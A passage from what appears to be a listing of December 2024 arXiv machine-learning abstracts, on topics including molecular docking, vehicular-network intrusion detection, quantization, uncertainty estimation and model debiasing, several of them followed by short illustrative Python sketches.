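    def forward(self, h):
        return torch.relu(self.mix(h))

def prefill_kv(layers, x, early=2):
    h = x
    for layer in layers[:early]:                     # full compute up to `early`
        h = layer(h)
    # Later layers derive K/V from the single early hidden state `h`
    # instead of from their own (skipped) block outputs.
    return [(l.k_proj(h), l.v_proj(h)) for l in layers[early:]]

layers = nn.ModuleList(ToyLayer() for _ in range(6))
cache = prefill_kv(layers, torch.randn(4, 10, 32))   # (batch, seq, dim)
print(len(cache), cache[0][0].shape)
```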
Updated: 2024-12-05 14:56:56
Fields: cs.LG,cs.AI,cs.CL
Dockformer: A transformer-based molecular docking paradigm for large-scale virtual screening
Molecular docking is a crucial step in drug development that enables the virtual screening of compound libraries to identify potential ligands targeting proteins of interest. However, the computational complexity of traditional docking models increases with the size of the compound library. Recently, deep learning algorithms have offered data-driven models that can accelerate the docking process. Unfortunately, few such models achieve screening performance superior to that of traditional models. Therefore, a novel deep learning-based docking approach named Dockformer is introduced in this study. Dockformer leverages multimodal information to capture the geometric topology and structural knowledge of molecules and can directly generate binding conformations with corresponding confidence measures in an end-to-end manner. The experimental results show that Dockformer achieves success rates of 90.53% and 82.71% on the PDBbind core set and PoseBusters benchmarks, respectively, with a more than 100-fold increase in inference speed, outperforming almost all state-of-the-art docking methods. In addition, the ability of Dockformer to identify the main protease inhibitors of coronaviruses is demonstrated in a real-world virtual screening scenario. Considering its high docking accuracy and screening efficiency, Dockformer can be regarded as a powerful and robust tool in the field of drug design.
Updated: 2024-12-05 14:56:30
Fields: cs.LG,cs.AI
DistB-VNET: Distributed Cluster-based Blockchain Vehicular Ad-Hoc Networks through SDN-NFV for Smart City
In the developing field of smart cities, Vehicular Ad-Hoc Networks (VANETs) are crucial for enabling reliable interaction between vehicles and infrastructure. This research proposes a distributed Blockchain-based Vehicular Ad-hoc Network (DistB-VNET) architecture that includes binary malicious traffic classification, Software Defined Networking (SDN), and Network Function Virtualization (NFV) to ensure safe, scalable, and reliable vehicular networks in smart cities. The proposed framework combines a decentralized blockchain for safe data management with SDN-NFV for dynamic network management and resource efficiency, while a novel isolation forest algorithm serves as an Intrusion Detection System (IDS). Further, DistB-VNET offers a dual-layer blockchain system, where a distributed blockchain provides safe communication between vehicles, while a centralized blockchain in the cloud is in charge of data verification and storage. This improves security, scalability, and adaptability, ensuring better traffic management, data security, and privacy in VANETs. Furthermore, the unsupervised isolation forest model achieves a high accuracy of 99.23% for detecting malicious traffic. Our evaluation also reveals that the method greatly improves network performance, offering decreased latency, increased security, and reduced congestion, making it an effective alternative to existing smart city infrastructures.
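The IDS component is an unsupervised isolation forest; a minimal sketch on stand-in flow features is shown below (a real deployment would consume extracted VANET traffic features, and the contamination level here is an assumption).

```python
import numpy as np
from sklearn.ensemble import IsolationForest

rng = np.random.default_rng(0)
benign = rng.normal(0.0, 1.0, size=(1000, 8))     # stand-in flow features
malicious = rng.normal(4.0, 1.0, size=(50, 8))

ids = IsolationForest(n_estimators=100, contamination=0.05, random_state=0)
ids.fit(benign)                                   # fit on (mostly) benign traffic
print("flagged:", np.mean(ids.predict(malicious) == -1))  # -1 = anomaly
```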
Updated: 2024-12-05 14:55:05
Fields: cs.CR
Customize Segment Anything Model for Multi-Modal Semantic Segmentation with Mixture of LoRA Experts
The recent Segment Anything Model (SAM) represents a significant breakthrough in scaling segmentation models, delivering strong performance across various downstream applications in the RGB modality. However, directly applying SAM to emerging visual modalities, such as depth and event data, results in suboptimal performance on multi-modal segmentation tasks. In this paper, we make the first attempt to adapt SAM for multi-modal semantic segmentation by proposing a Mixture of Low-Rank Adaptation Experts (MoE-LoRA) tailored for different input visual modalities. By training only the MoE-LoRA layers while keeping SAM's weights frozen, SAM's strong generalization and segmentation capabilities can be preserved for downstream tasks. Specifically, to address cross-modal inconsistencies, we propose a novel MoE routing strategy that adaptively generates weighted features across modalities, enhancing multi-modal feature integration. Additionally, we incorporate multi-scale feature extraction and fusion by adapting SAM's segmentation head and introducing an auxiliary segmentation head to effectively combine multi-scale features for improved segmentation performance. Extensive experiments were conducted on three multi-modal benchmarks: DELIVER, MUSES, and MCubeS. The results consistently demonstrate that the proposed method significantly outperforms state-of-the-art approaches across diverse scenarios. Notably, under the particularly challenging condition of missing modalities, our approach exhibits a substantial performance gain, achieving an improvement of 32.15% compared to existing methods.
Updated: 2024-12-05 14:54:31
Fields: cs.CV,cs.AI
MetricGold: Leveraging Text-To-Image Latent Diffusion Models for Metric Depth Estimation
Recovering metric depth from a single image remains a fundamental challenge in computer vision, requiring both scene understanding and accurate scaling. While deep learning has advanced monocular depth estimation, current models often struggle with unfamiliar scenes and layouts, particularly in zero-shot scenarios and when predicting scale-ergodic metric depth. We present MetricGold, a novel approach that harnesses a generative diffusion model's rich priors to improve metric depth estimation. Building upon recent advances in MariGold, DDVM, and Depth Anything V2, our method combines latent diffusion, a log-scaled metric depth representation, and synthetic data training. MetricGold achieves efficient training on a single RTX 3090 within two days using photo-realistic synthetic data from HyperSIM, VirtualKitti, and TartanAir. Our experiments demonstrate robust generalization across diverse datasets, producing sharper and higher-quality metric depth estimates than existing approaches.
Updated: 2024-12-05 14:51:55
Fields: cs.CV,cs.AI,cs.GR,cs.RO
Physics-informed Deep Learning for Muscle Force Prediction with Unlabeled sEMG Signals
Computational biomechanical analysis plays a pivotal role in understanding and improving human movements and physical functions. Although physics-based modeling methods can interpret the dynamic interaction between the neural drive, muscle dynamics, and joint kinematics, they suffer from high computational latency. In recent years, data-driven methods have emerged as a promising alternative due to their fast execution speed, but label information is still required during training, which is not easy to acquire in practice. To tackle these issues, this paper presents a novel physics-informed deep learning method that predicts muscle forces without any label information during model training. In addition, the proposed method can also identify personalized muscle-tendon parameters. To achieve this, Hill-muscle-model-based forward dynamics is embedded into the deep neural network as an additional loss to further regulate its behavior. Experimental validations on the wrist joints of six healthy subjects are performed, and a fully connected neural network (FNN) is selected to implement the proposed method. The predicted muscle forces show comparable or even lower root mean square error (RMSE) and higher coefficients of determination than baseline methods, which must use labeled surface electromyography (sEMG) signals; the method also identifies muscle-tendon parameters accurately, demonstrating the effectiveness of the proposed physics-informed deep learning approach.
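The training objective can be sketched as follows (a greatly simplified assumption: hill_forward_dynamics below is a toy stand-in for the paper's Hill-model forward dynamics, and all dimensions are illustrative); note that only measured kinematics, not force labels, supervise the network.

```python
import torch

def hill_forward_dynamics(force, joint_angle, moment_arm=0.04, inertia=0.05):
    """Toy stand-in: map predicted muscle forces to joint acceleration."""
    torque = moment_arm * force.sum(dim=-1) - 0.1 * torch.sin(joint_angle)
    return torque / inertia

def physics_informed_loss(net, semg, joint_angle, joint_accel):
    force_pred = net(semg)                     # muscle forces, no labels used
    accel_pred = hill_forward_dynamics(force_pred, joint_angle)
    # Equation-of-motion residual replaces labeled force supervision.
    return torch.mean((accel_pred - joint_accel) ** 2)

net = torch.nn.Sequential(torch.nn.Linear(4, 32), torch.nn.ReLU(),
                          torch.nn.Linear(32, 2))  # 4 sEMG channels -> 2 muscles
loss = physics_informed_loss(net, torch.randn(8, 4),
                             torch.zeros(8), torch.zeros(8))
loss.backward()
```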
Updated: 2024-12-05 14:47:38
Fields: cs.LG,cs.HC,eess.SP,physics.bio-ph
Agent-OM: Leveraging LLM Agents for Ontology Matching
Ontology matching (OM) enables semantic interoperability between different ontologies and resolves their conceptual heterogeneity by aligning related entities. OM systems currently have two prevailing design paradigms: conventional knowledge-based expert systems and newer machine learning-based predictive systems. While large language models (LLMs) and LLM agents have revolutionised data engineering and have been applied creatively in many domains, their potential for OM remains underexplored. This study introduces a novel agent-powered LLM-based design paradigm for OM systems. With consideration of several specific challenges in leveraging LLM agents for OM, we propose a generic framework, namely Agent-OM (Agent for Ontology Matching), consisting of two Siamese agents for retrieval and matching, with a set of simple OM tools. Our framework is implemented in a proof-of-concept system. Evaluations on three Ontology Alignment Evaluation Initiative (OAEI) tracks against state-of-the-art OM systems show that our system can achieve results very close to the long-standing best performance on simple OM tasks and can significantly improve the performance on complex and few-shot OM tasks.
Updated: 2024-12-05 14:45:05
Fields: cs.AI,cs.CL,cs.IR
Relationships between Keywords and Strong Beats in Lyrical Music
Artificial Intelligence (AI) song generation has emerged as a popular topic, yet exploration of the latent correlations between specific lyrical and rhythmic features remains limited. In contrast, this pilot study specifically investigates the relationships between keywords and rhythmically stressed features such as strong beats in songs. It focuses on several key elements: keywords or non-keywords, stressed or unstressed syllables, and strong or weak beats, with the aim of uncovering insightful correlations. Experimental results indicate that, on average, 80.8% of keywords land on strong beats, whereas 62% of non-keywords fall on weak beats. The relationship between stressed syllables and strong or weak beats is weak, revealing that keywords have the strongest relationship with strong beats. Additionally, the lyrics-rhythm matching score, a key metric measuring keywords on strong beats and non-keywords on weak beats across various time signatures, is 0.765, while the matching score for syllable types is 0.495. This study demonstrates that word types align strongly with their corresponding beat types, as evidenced by the distinct patterns, whereas syllable types exhibit a much weaker alignment. This disparity underscores the greater reliability of word types in capturing rhythmic structures in music, highlighting their crucial role in effective rhythmic matching and analysis. We also conclude that keywords that consistently align with strong beats are more reliable indicators of lyrics-rhythm associations, providing valuable insights for AI-driven song generation through enhanced structural analysis. Furthermore, our tailored Lyrics-Rhythm Matching (LRM) metrics maximize lyrical alignment with corresponding beat stresses, and our novel LRM file format captures critical lyrical and rhythmic information without needing the original sheet music.
Updated: 2024-12-05 14:40:27
Fields: cs.SD,cs.AI,eess.AS
Spatio-Temporal Context Prompting for Zero-Shot Action Detection
Spatio-temporal action detection encompasses the tasks of localizing and classifying individual actions within a video. Recent works aim to enhance this process by incorporating interaction modeling, which captures the relationship between people and their surrounding context. However, these approaches have primarily focused on fully-supervised learning, and the current limitation lies in the lack of generalization capability to recognize unseen action categories. In this paper, we aim to adapt the pretrained image-language models to detect unseen actions. To this end, we propose a method which can effectively leverage the rich knowledge of visual-language models to perform Person-Context Interaction. Meanwhile, our Context Prompting module will utilize contextual information to prompt labels, thereby enhancing the generation of more representative text features. Moreover, to address the challenge of recognizing distinct actions by multiple people at the same timestamp, we design the Interest Token Spotting mechanism which employs pretrained visual knowledge to find each person's interest context tokens, and then these tokens will be used for prompting to generate text features tailored to each individual. To evaluate the ability to detect unseen actions, we propose a comprehensive benchmark on J-HMDB, UCF101-24, and AVA datasets. The experiments show that our method achieves superior results compared to previous approaches and can be further extended to multi-action videos, bringing it closer to real-world applications. The code and data can be found in https://webber2933.github.io/ST-CLIP-project-page.
Updated: 2024-12-05 14:38:12
Fields: cs.CV,cs.AI
On the Benefits of Active Data Collection in Operator Learning
We investigate active data collection strategies for operator learning when the target operator is linear and the input functions are drawn from a mean-zero stochastic process with continuous covariance kernels. With an active data collection strategy, we establish an error convergence rate in terms of the decay rate of the eigenvalues of the covariance kernel. Thus, with sufficiently rapid eigenvalue decay of the covariance kernels, arbitrarily fast error convergence rates can be achieved. This contrasts with passive (i.i.d.) data collection strategies, where the convergence rate is never faster than ~ n^{-1}. In fact, for our setting, we establish a non-vanishing lower bound for any passive data collection strategy, regardless of the eigenvalue decay rate of the covariance kernel. Overall, our results show the benefit of active over passive data collection strategies in operator learning.
Updated: 2024-12-05 14:34:08
Fields: stat.ML,cs.LG
Fast and reliable uncertainty quantification with neural network ensembles for industrial image classification
Image classification with neural networks (NNs) is widely used in industrial processes, where the model is likely to encounter unknown objects during deployment, i.e., out-of-distribution (OOD) data. Worryingly, NNs tend to make confident yet incorrect predictions when confronted with OOD data. To increase the models' reliability, they should quantify the uncertainty in their own predictions, communicating when the output should (not) be trusted. Deep ensembles, composed of multiple independent NNs, have been shown to perform strongly but are computationally expensive. Recent research has proposed more efficient NN ensembles, namely the snapshot, batch, and multi-input multi-output ensembles. This study investigates the predictive and uncertainty performance of efficient NN ensembles in the context of image classification for industrial processes. It is the first to provide a comprehensive comparison, and it proposes a novel Diversity Quality metric to quantify an ensemble's performance on the in-distribution and OOD sets in a single metric. The results highlight the batch ensemble as a cost-effective and competitive alternative to the deep ensemble. It matches the deep ensemble in both uncertainty and accuracy while exhibiting considerable savings in training time, test time, and memory storage.
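Whichever ensemble variant is used, a common way to turn its members' outputs into an uncertainty score is the entropy of the averaged softmax; a small sketch follows (our illustration, not the paper's Diversity Quality metric).

```python
import numpy as np

def predictive_entropy(member_probs):
    """member_probs: (n_members, n_samples, n_classes) softmax outputs."""
    mean_p = member_probs.mean(axis=0)            # average over members
    return -(mean_p * np.log(mean_p + 1e-12)).sum(axis=-1)

probs = np.random.dirichlet(np.ones(10), size=(5, 32))  # 5 members, 32 samples
unc = predictive_entropy(probs)                   # high entropy -> likely OOD
print(unc.shape, float(unc.max()))
```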
Updated: 2024-12-05 14:30:41
Fields: cs.LG,stat.ML
Directed Structural Adaptation to Overcome Statistical Conflicts and Enable Continual Learning
Adaptive networks today rely on overparameterized fixed topologies that cannot break through the statistical conflicts they encounter in the data they are exposed to, and they are prone to "catastrophic forgetting" as the network attempts to reuse existing structures to learn new tasks. We propose a structural adaptation method, DIRAD, that can complexify as needed and in a directed manner without being limited by statistical conflicts within a dataset. We then extend this method and present the PREVAL framework, designed to prevent "catastrophic forgetting" in continual learning by detecting new data and assigning encountered data to suitable models adapted to process them, without needing task labels anywhere in the workflow. We show the reliability of DIRAD in growing networks that achieve high performance while being orders of magnitude simpler than fixed-topology networks, and we demonstrate the proof-of-concept operation of PREVAL, in which continual adaptation to new tasks is observed while previously encountered tasks are detected and discerned.
Updated: 2024-12-05 14:30:18
Fields: cs.LG,cs.AI
Molmo and PixMo: Open Weights and Open Data for State-of-the-Art Vision-Language Models
Today's most advanced vision-language models (VLMs) remain proprietary. The strongest open-weight models rely heavily on synthetic data from proprietary VLMs to achieve good performance, effectively distilling these closed VLMs into open ones. As a result, the community has been missing foundational knowledge about how to build performant VLMs from scratch. We present Molmo, a new family of VLMs that are state-of-the-art in their class of openness. Our key contribution is a collection of new datasets called PixMo, including a dataset of highly detailed image captions for pre-training, a free-form image Q&A dataset for fine-tuning, and an innovative 2D pointing dataset, all collected without the use of external VLMs. The success of our approach relies on careful modeling choices, a well-tuned training pipeline, and, most critically, the quality of our newly collected datasets. Our best-in-class 72B model not only outperforms others in the class of open weight and data models, but also outperforms larger proprietary models, including Claude 3.5 Sonnet and Gemini 1.5 Pro and Flash, ranking second only to GPT-4o on both academic benchmarks and a large human evaluation. Our model weights, new datasets, and source code are available at https://molmo.allenai.org/blog.
Updated: 2024-12-05 14:28:40
Fields: cs.CV,cs.CL,cs.LG
Leveraging Large Language Models to Generate Course-specific Semantically Annotated Learning Objects
Background: Over the past few decades, the process and methodology of automated question generation (AQG) have undergone significant transformations. Recent progress in generative natural language models has opened up new potential in the generation of educational content. Objectives: This paper explores the potential of large language models (LLMs) for generating computer science questions that are sufficiently annotated for automatic learner model updates, are fully situated in the context of a particular course, and address the cognitive dimension "understand". Methods: Unlike previous attempts that might use basic methods like ChatGPT, our approach involves more targeted strategies such as retrieval-augmented generation (RAG) to produce contextually relevant and pedagogically meaningful learning objects. Results and Conclusions: Our results show that generating structural, semantic annotations works well. However, this success was not reflected in the case of relational annotations. The quality of the generated questions often did not meet educational standards, highlighting that although LLMs can contribute to the pool of learning materials, their current level of performance requires significant human intervention to refine and validate the generated content.
Updated: 2024-12-05 14:24:07
Fields: cs.AI
Linear Discriminant Analysis in Credit Scoring: A Transparent Hybrid Model Approach
The development of computing has made credit scoring approaches possible, with various machine learning (ML) and deep learning (DL) techniques becoming more and more valuable. While complex models yield more accurate predictions, their interpretability is often weakened, which is a concern for credit scoring, where decision fairness is of great importance. As the features of the dataset are a crucial factor for a credit scoring system, we implement Linear Discriminant Analysis (LDA) as a feature-reduction technique, which reduces the burden of model complexity. We compared 6 different machine learning models, 1 deep learning model, and a hybrid model, each with and without LDA. From the results, we found that our hybrid model, XG-DNN, outperformed the other models, with the highest accuracy of 99.45% and a 99% F1 score when using LDA. Lastly, to interpret model decisions, we applied 2 different explainable AI techniques, LIME (local) and Morris Sensitivity Analysis (global). Through this research, we show how feature-reduction techniques can be used without affecting the performance and explainability of the model, which can be very useful in resource-constrained settings to optimize the computational workload.
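The feature-reduction step is standard LDA; a compact sketch with synthetic data is shown below (LogisticRegression stands in for the paper's XG-DNN hybrid, which we do not reproduce here).

```python
from sklearn.datasets import make_classification
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import cross_val_score
from sklearn.pipeline import make_pipeline

X, y = make_classification(n_samples=2000, n_features=30, n_informative=10,
                           random_state=0)
# Binary credit scoring: LDA can project to at most n_classes - 1 = 1 dim.
model = make_pipeline(LinearDiscriminantAnalysis(n_components=1),
                      LogisticRegression())
print(cross_val_score(model, X, y, cv=5).mean())
```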
Updated: 2024-12-05 14:21:18
Fields: cs.LG
SKIM: Any-bit Quantization Pushing The Limits of Post-Training Quantization
Large Language Models (LLMs) exhibit impressive performance across various tasks, but deploying them for inference poses challenges. Their high resource demands often necessitate complex, costly multi-GPU pipelines or the use of smaller, less capable models. While quantization offers a promising solution by utilizing lower precision for model storage, existing methods frequently experience significant performance drops at lower precision levels. Additionally, they typically provide only a limited set of solutions at specific bit levels, many of which are extensively manually tuned. To address these challenges, we propose a new method called SKIM: Scaled K-means clustering wIth Mixed precision. Our approach introduces two novel techniques: 1. a greedy algorithm to solve approximately optimal bit allocation across weight channels, and 2. a trainable scaling vector for non-differentiable K-means clustering. These techniques substantially improve performance and can be adapted to any given bit width. Notably, in terms of model perplexity, our method narrows the gap between 3-bit quantized LLaMA models and their full-precision counterparts by 16.3% on average.
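As a toy baseline for the clustering component (SKIM's scaling vector, mixed precision, and greedy bit allocation are all omitted; this is only plain K-means quantization of one weight channel):

```python
import numpy as np
from sklearn.cluster import KMeans

def kmeans_quantize(w, bits=3):
    """Replace each weight by one of 2**bits learned centroids."""
    km = KMeans(n_clusters=2**bits, n_init=5, random_state=0)
    labels = km.fit_predict(w.reshape(-1, 1))
    return km.cluster_centers_[labels].reshape(w.shape)

w = np.random.randn(256)          # one weight channel
w_q = kmeans_quantize(w, bits=3)  # 3-bit codebook
print("mse:", float(np.mean((w - w_q) ** 2)))
```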
Updated: 2024-12-05 14:19:59
Fields: cs.LG
Multi-Layer Privacy-Preserving Record Linkage with Clerical Review based on gradual information disclosure
Privacy-Preserving Record linkage (PPRL) is an essential component in data integration tasks of sensitive information. The linkage quality determines the usability of combined datasets and (machine learning) applications based on them. We present a novel privacy-preserving protocol that integrates clerical review in PPRL using a multi-layer active learning process. Uncertain match candidates are reviewed on several layers by human and non-human oracles to reduce the amount of disclosed information per record and in total. Predictions are propagated back to update previous layers, resulting in an improved linkage performance for non-reviewed candidates as well. The data owners remain in control of the amount of information they share for each record. Therefore, our approach follows need-to-know and data sovereignty principles. The experimental evaluation on real-world datasets shows considerable linkage quality improvements with limited labeling effort and privacy risks.
Updated: 2024-12-05 14:18:50
Fields: cs.CR,cs.DB,cs.LG
Fixed-Mean Gaussian Processes for Post-hoc Bayesian Deep Learning
Recently, there has been an increasing interest in performing post-hoc uncertainty estimation about the predictions of pre-trained deep neural networks (DNNs). Given a DNN pre-trained via back-propagation, these methods enhance the original network by adding output confidence measures, such as error bars, without compromising its initial accuracy. In this context, we introduce a novel family of sparse variational Gaussian processes (GPs), where the posterior mean is fixed to any continuous function when using a universal kernel. Specifically, we fix the mean of this GP to the output of the pre-trained DNN, allowing our approach to effectively fit the GP's predictive variances to estimate the DNN prediction uncertainty. Our approach leverages variational inference (VI) for efficient stochastic optimization, with training costs that remain independent of the number of training points, scaling efficiently to large datasets such as ImageNet. The proposed method, called fixed-mean GP (FMGP), is architecture-agnostic, relying solely on the pre-trained model's outputs to adjust the predictive variances. Experimental results demonstrate that FMGP improves both uncertainty estimation and computational efficiency when compared to state-of-the-art methods.
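The fixed-mean idea can be sketched with an exact GP (the paper uses sparse variational GPs for scalability; the RBF kernel, noise level, and the residual-corrected mean below are our simplifications): the prior mean is pinned to the pre-trained network's output f, and the GP mainly contributes predictive variances.

```python
import numpy as np

def rbf(A, B, ls=1.0):
    d2 = ((A[:, None, :] - B[None, :, :]) ** 2).sum(-1)
    return np.exp(-0.5 * d2 / ls**2)

def fixed_mean_gp_predict(f, X_tr, y_tr, X_te, noise=0.1):
    K = rbf(X_tr, X_tr) + noise * np.eye(len(X_tr))
    Ks, Kss = rbf(X_te, X_tr), rbf(X_te, X_te)
    alpha = np.linalg.solve(K, y_tr - f(X_tr))   # residuals around the DNN mean
    mean = f(X_te) + Ks @ alpha                  # ~= f(X_te) when the DNN fits well
    var = np.diag(Kss - Ks @ np.linalg.solve(K, Ks.T)) + noise
    return mean, var

f = lambda X: np.sin(X[:, 0])                    # stand-in pre-trained DNN
X_tr = np.linspace(-3, 3, 25)[:, None]
y_tr = f(X_tr) + 0.1 * np.random.randn(25)
mean, var = fixed_mean_gp_predict(f, X_tr, y_tr, np.linspace(-4, 4, 50)[:, None])
```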
Updated: 2024-12-05 14:17:16
Fields: cs.LG,stat.ML
Adaptive Circuit Behavior and Generalization in Mechanistic Interpretability
Mechanistic interpretability aims to understand the inner workings of large neural networks by identifying circuits, or minimal subgraphs within the model that implement algorithms responsible for performing specific tasks. These circuits are typically discovered and analyzed using a narrowly defined prompt format. However, given the ability of large language models (LLMs) to generalize across various prompt formats for the same task, it remains unclear how well these circuits generalize. For instance, it is unclear whether the model's generalization results from reusing the same circuit components, from the components behaving differently, or from the use of entirely different components. In this paper, we investigate the generality of the indirect object identification (IOI) circuit in GPT-2 small, which is well-studied and believed to implement a simple, interpretable algorithm. We evaluate its performance on prompt variants that challenge the assumptions of this algorithm. Our findings reveal that the circuit generalizes surprisingly well, reusing all of its components and mechanisms while only adding additional input edges. Notably, the circuit generalizes even to prompt variants where the original algorithm should fail; we discover a mechanism that explains this, which we term S2 Hacking. Our findings indicate that circuits within LLMs may be more flexible and general than previously recognized, underscoring the importance of studying circuit generalization to better understand the broader capabilities of these models.
Updated: 2024-12-05 14:16:57
Fields: cs.LG,cs.AI,cs.CL,I.2.7
Bench-CoE: a Framework for Collaboration of Experts from Benchmark
Large Language Models (LLMs) are key technologies driving intelligent systems to handle multiple tasks. To meet the demands of various tasks, an increasing number of LLM-driven experts with diverse capabilities have been developed, accompanied by corresponding benchmarks to evaluate their performance. This paper proposes the Bench-CoE framework, which enables Collaboration of Experts (CoE) by effectively leveraging benchmark evaluations to achieve optimal performance across various tasks. Bench-CoE includes a set of expert models, a router for assigning tasks to corresponding experts, and a benchmark dataset for training the router. Moreover, we formulate Query-Level and Subject-Level approaches based on our framework, and analyze the merits and drawbacks of these two approaches. Finally, we conduct a series of experiments with varying data distributions on both language and multimodal tasks to validate that our proposed Bench-CoE outperforms any single model in terms of overall performance. We hope this method serves as a baseline for further research in this area. The code is available at https://github.com/ZhangXJ199/Bench-CoE.
Updated: 2024-12-05 14:03:41
Fields: cs.AI
An In-Depth Examination of Risk Assessment in Multi-Class Classification Algorithms
Advanced classification algorithms are increasingly used in safety-critical applications like healthcare and engineering. In such applications, misclassifications made by ML algorithms can result in substantial financial or health-related losses. To better anticipate and prepare for such losses, the algorithm user seeks an estimate of the probability that the algorithm misclassifies a sample. We refer to this task as risk-assessment. For a variety of models and datasets, we numerically analyze the performance of different methods in solving the risk-assessment problem. We consider two solution strategies: a) calibration techniques that calibrate the output probabilities of classification models to provide accurate probability outputs; and b) a novel approach based upon the prediction-interval generation technique of conformal prediction. Our conformal-prediction-based approach is model- and data-distribution-agnostic, simple to implement, and provides reasonable results for a variety of use cases. We compare the different methods on a broad variety of models and datasets.
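One simple way to instantiate the conformal-prediction strategy, shown purely as a sketch (split-conformal calibration with a softmax-based nonconformity score; the paper's construction may differ):

```python
import numpy as np

def conformal_threshold(cal_probs, cal_labels, alpha=0.1):
    # Nonconformity = 1 - probability assigned to the true class.
    scores = 1.0 - cal_probs[np.arange(len(cal_labels)), cal_labels]
    n = len(scores)
    return np.quantile(scores, np.ceil((n + 1) * (1 - alpha)) / n)

def high_risk(test_probs, q):
    # Flag samples whose top class is not confidently covered at level alpha.
    return (1.0 - test_probs.max(axis=1)) > q

cal_probs = np.random.dirichlet(np.ones(5), size=500)   # stand-in model outputs
cal_labels = np.random.randint(0, 5, 500)
q = conformal_threshold(cal_probs, cal_labels)
print("high-risk fraction:",
      high_risk(np.random.dirichlet(np.ones(5), 100), q).mean())
```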
Updated: 2024-12-05 14:03:16
Fields: cs.LG,cs.NA,math.NA
On the Lack of Robustness of Binary Function Similarity Systems
Binary function similarity, which often relies on learning-based algorithms to identify which functions in a pool are most similar to a given query function, is a sought-after topic in different communities, including machine learning, software engineering, and security. Its importance stems from the impact it has in facilitating several crucial tasks, from reverse engineering and malware analysis to automated vulnerability detection. Whereas recent work has cast light on performance for this long-studied problem, the research landscape remains largely lacking in understanding the resiliency of state-of-the-art machine learning models against adversarial attacks. As security requires reasoning about adversaries, in this work we assess the robustness of such models through a simple yet effective black-box greedy attack, which modifies the topology and the content of the control flow of the attacked functions. We demonstrate that this attack is successful in compromising all the models, achieving average attack success rates of 57.06% and 95.81% depending on the problem settings (targeted and untargeted attacks). Our findings are insightful: top performance on clean data does not necessarily imply top robustness properties, which explicitly highlights performance-robustness trade-offs one should consider when deploying such models, calling for further research.
Updated: 2024-12-05 13:54:53
Fields: cs.CR,cs.LG
When Stability meets Sufficiency: Informative Explanations that do not Overwhelm
Recent studies evaluating various criteria for explainable artificial intelligence (XAI) suggest that fidelity, stability, and comprehensibility are among the most important metrics considered by users of AI across a diverse collection of usage contexts. We consider these criteria as applied to feature-based attribution methods, which are amongst the most prevalent in XAI literature. Going beyond standard correlation, methods have been proposed that highlight what is minimally sufficient to justify the classification of an input (viz., pertinent positives). While minimal sufficiency is an attractive property akin to comprehensibility, the resulting explanations are often too sparse for a human to understand and evaluate the local behavior of the model. To overcome these limitations, we incorporate the criteria of stability and fidelity and propose a novel method called the Path-Sufficient Explanations Method (PSEM), which outputs a sequence of stable and sufficient explanations for a given input of strictly decreasing size (or value) -- from the original input to a minimally sufficient explanation -- which can be thought of as tracing the local boundary of the model in a stable manner, thus providing better intuition about the local model behavior for the specific input. We validate these claims, both qualitatively and quantitatively, with experiments that show the benefit of PSEM across three modalities (image, tabular, and text) as well as versus other path explanations. A user study demonstrates the strength of the method in communicating the local behavior, where (many) users are able to correctly determine the prediction made by the model.
Updated: 2024-12-05 13:50:59
Fields: cs.LG,cs.AI
LossVal: Efficient Data Valuation for Neural Networks
Assessing the importance of individual training samples is a key challenge in machine learning. Traditional approaches retrain models with and without specific samples, which is computationally expensive and ignores dependencies between data points. We introduce LossVal, an efficient data valuation method that computes importance scores during neural network training by embedding a self-weighting mechanism into loss functions like cross-entropy and mean squared error. LossVal reduces computational costs, making it suitable for large datasets and practical applications. Experiments on classification and regression tasks across multiple datasets show that LossVal effectively identifies noisy samples and is able to distinguish helpful from harmful samples. We examine the gradient calculation of LossVal to highlight its advantages. The source code is available at: https://github.com/twibiral/LossVal
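Our reading of the mechanism, as a minimal sketch (not the reference implementation; the softplus parameterization and batch renormalization of the weights are assumptions): a learnable weight per training sample is embedded into the loss, so importance scores emerge from training itself.

```python
import torch
import torch.nn.functional as F

n_train = 1000
sample_w = torch.nn.Parameter(torch.ones(n_train))   # one weight per sample

def lossval_ce(logits, targets, idx):
    w = F.softplus(sample_w[idx])                    # keep weights positive
    w = w / w.sum() * len(idx)                       # renormalize within batch
    return (w * F.cross_entropy(logits, targets, reduction="none")).mean()

logits = torch.randn(16, 10, requires_grad=True)
targets = torch.randint(0, 10, (16,))
idx = torch.randint(0, n_train, (16,))
lossval_ce(logits, targets, idx).backward()          # gradients reach sample_w
# After training, small learned weights mark unhelpful (e.g., noisy) samples.
```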
Updated: 2024-12-05 13:46:55
Fields: cs.LG
Non-Asymptotic Bounds for Closed-Loop Identification of Unstable Nonlinear Stochastic Systems
We consider the problem of least squares parameter estimation from single-trajectory data for discrete-time, unstable, closed-loop nonlinear stochastic systems, with linearly parameterised uncertainty. Assuming a region of the state space produces informative data, and the system is sub-exponentially unstable, we establish non-asymptotic guarantees on the estimation error at times where the state trajectory evolves in this region. If the whole state space is informative, high probability guarantees on the error hold for all times. Examples are provided where our results are useful for analysis, but existing results are not.
Updated: 2024-12-05 13:45:35
Fields: eess.SY,cs.LG,cs.SY,math.OC
Looking at Model Debiasing through the Lens of Anomaly Detection
It is widely recognized that deep neural networks are sensitive to bias in the data. This means that during training these models are likely to learn spurious correlations between data and labels, resulting in limited generalization abilities and low performance. In this context, model debiasing approaches can be devised that aim at reducing the model's dependency on such unwanted correlations, either leveraging knowledge of the bias information or not. In this work, we focus on the latter and more realistic scenario, showing the importance of accurately predicting the bias-conflicting and bias-aligned samples to obtain compelling performance in bias mitigation. On this basis, we propose to conceive the problem of model bias from an out-of-distribution perspective, introducing a new bias identification method based on anomaly detection. We claim that when data is mostly biased, bias-conflicting samples can be regarded as outliers with respect to the bias-aligned distribution in the feature space of a biased model, thus allowing them to be precisely detected with an anomaly detection method. Coupling the proposed bias identification approach with bias-conflicting data upsampling and augmentation in a two-step strategy, we reach state-of-the-art performance on synthetic and real benchmark datasets. Ultimately, our proposed approach shows that the data bias issue does not necessarily require complex debiasing methods, provided that an accurate bias identification procedure is defined. Source code is available at https://github.com/Malga-Vision/MoDAD
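The bias-identification step, as we read it, amounts to outlier detection in the biased model's feature space; a sketch with an off-the-shelf detector follows (IsolationForest and the contamination rate are our illustrative choices, not necessarily the paper's).

```python
import numpy as np
from sklearn.ensemble import IsolationForest

def find_bias_conflicting(features, contamination=0.1):
    """Return indices of likely bias-conflicting samples (feature outliers)."""
    det = IsolationForest(contamination=contamination, random_state=0)
    flags = det.fit_predict(features)     # -1 = outlier w.r.t. bias-aligned bulk
    return np.where(flags == -1)[0]       # candidates for upsampling/augmentation

feats = np.random.randn(500, 64)          # stand-in penultimate-layer features
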